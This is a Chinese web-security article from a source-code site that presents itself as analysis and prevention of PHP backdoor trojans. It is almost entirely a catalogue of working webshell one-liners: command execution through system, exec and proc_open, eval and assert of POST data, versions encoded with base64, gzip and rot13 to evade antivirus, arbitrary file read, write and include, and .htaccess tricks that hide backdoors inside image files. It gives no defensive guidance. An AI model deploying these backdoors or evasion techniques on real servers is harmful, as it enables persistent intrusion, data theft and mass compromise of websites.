php后门木马常用命令分析与防范

阿奇源码默认解压密码为"www.aqiyuanma.com",2021年9月11日前的源码默认解压密码为"www.hnymwl.com"
阿奇官方VIP技术群:483386718,阿奇源码技术交流群:938992858!速奇云-香港云服务器38元/月

php后门木马常用的函数大致上可分为四种类型: 
  1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open 
  2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13 
  3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite 
  4. .htaccess: SetHandler, auto_prepend_file, auto_append_file 

  1. 执行系统命令: 
  system 函数 
  //test.php?cmd=ls 
  system($_GET[cmd]); 
  passthru 函数 
  //test.php?cmd=ls 
  passthru($_GET[cmd]); 
  shell_exec 函数 
  //test.php?cmd=ls 
  echo shell_exec($_GET[cmd]); 
  exec 函数 
  //test.php?cmd=ls 
  $arr = array(); 
  exec($_GET[cmd],$arr); 
  print_r($arr); 
  popen 函数 
  //test.php?cmd=ls 
  $handle = popen(‘$_GET[cmd], ‘r’); 
  $read = fread($handle, 2096); 
  echo $read; 
  pclose($handle); 
  proc_open 函数 
  //test.php?cmd=ls 
  $descriptorspec = array( 
  0 => array(‘pipe’, ‘r’), 
  1 => array(‘pipe’, ‘w’), 
  2 => array(‘pipe’, ‘w’), 
  ); 
  $proc = @proc_open($_GET[cmd], $descriptorspec, $pipes); 
  fclose($pipes[0]); 
  $output = array(); 
  while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),”\n”)); 
  print_r($output); 
  2. 代码执行与加密: 
  eval 函数 
  //最常见的一句话木马 
  eval($_POST[cmd]); 
  base64_decode 函数 
  //为了免杀及隐藏而加密代码 
  //密文: eval($_POST[‘cmd’]); 
  eval(base64_decode(‘ZXZhbCgkX1BPU1RbJ2NtZCddKTs=’)); 
  gzinflate 函数 
  //为了免杀及隐藏而加密代码 
  //密文: eval($_POST[‘cmd’]); 
  eval(gzinflate(base64_decode(‘Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==’))); 
  gzuncompress 函数 
  //为了免杀及隐藏而加密代码 
  //密文: eval($_POST[‘cmd’]); 
  eval(gzuncompress(base64_decode(‘eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==’))); 
  gzdecode 函数 
  //为了免杀及隐藏而加密代码 
  //密文: eval($_POST[‘cmd’]); 
  eval(gzdecode(base64_decode(‘H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==’))); 
  str_rot13 函数 
  //为了免杀及隐藏而加密代码 
  //密文: eval($_POST[cmd]); 
  eval(str_rot13(‘riny($_CBFG[pzq]);’)); 
  assert 函数 
  //类似eval函数 
  assert($_POST[cmd]); 
  call_user_func 函数 
  //使用call_user_func调用assert 
  call_user_func(‘assert’,$_POST[cmd]); 
  call_user_func 函数 
  //使用call_user_func调用任意函数 
  //test.php?a=assert&cmd=phpinfo() 
  call_user_func($_GET[a],$_REQUEST[cmd]); 
  组合代码 
  //组合方式调用任意函数 
  //test.php?a=assert&cmd=phpinfo() 
  $_GET[a]($_REQUEST[cmd]); 
  3. 文件包含与生成: 
  require 函数 
  //包含任意文件 
  //test.php?file=123.jpg 
  require($_GET[file]); 
  require_once 函数 
  //包含任意文件 
  //test.php?file=123.jpg 
  require_once($_GET[file]); 
  include 函数 
  //包含任意文件 www.chnhack.com 
  //test.php?file=123.jpg 
  include($_GET[file]); 
  include_once 函数 
  //包含任意文件 
  //test.php?file=123.jpg 
  include_once($_GET[file]); 
  file_get_contents 函数 
  //读取任意文件 
  //test.php?f=config.inc.php 
  echo file_get_contents($_GET[‘f’]); 
  file_put_contents 函数 
  //生成任意内容文件 
  //a=test.php&b= 
  file_put_contents($_GET[a],$_GET[b]); 
  fputs 函数 
  //生成任意内容文件 
  //a=test.php&b= 
  fputs(fopen($_GET[a],”w”),$_GET[b]); 
  4. .htaccess: 
  SetHandler 
  //可将php代码存于非php后缀文件,例: x.jpg 
  //将以下代码写入.htaccess中 
  //连接x.jpg即可启动后门木马出处www.admin8.us 

  SetHandler application/x-httpd-php 

  auto_prepend_file 
  //可将php代码存于非php后缀文件,例: 123.gif 
  //将以下代码写入.htaccess中, 文件路径必须是绝对路径 
  //访问网站上任何php文件都会启动该php后门木马 
  //可在不更改站点源代码的情况下记录所有$_REQUEST的值,也可批量挂马 
  php_value auto_prepend_file c:/apache2/htdocs/123.gif 
  auto_append_file 
  //类似auto_prepend_file 
  //可将php代码存于非php后缀文件,例: 123.gif 
  //将以下代码写入.htaccess中, 文件路径必须是绝对路径 
  //访问网站上任何php文件都会启动该php后门木马 
  php_value auto_append_file c:/apache2/htdocs/123.gif 

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

注:在使用本系统时,使用方必须在国家相关法律法规范围内并经过国家相关部门的授权许可,禁止用于一切非法行为。使用用途仅限于测试、实验、研究为目的,禁止用于一切商业运营,本团队不承担使用者在使用过程中的任何违法行为负责。

阿奇源码 WEB安全 php后门木马常用命令分析与防范 https://www.aqiyuanma.com/42247.html

相关文章

官方客服团队

为您解决烦忧 - 24小时在线 专业服务

  • 0 +

    访问总数

  • 0 +

    会员总数

  • 0 +

    文章总数

  • 0 +

    今日发布

  • 0 +

    本周发布

  • 0 +

    运行天数

你的前景,远超我们想象
php后门木马常用命令分析与防范-海报

分享本文封面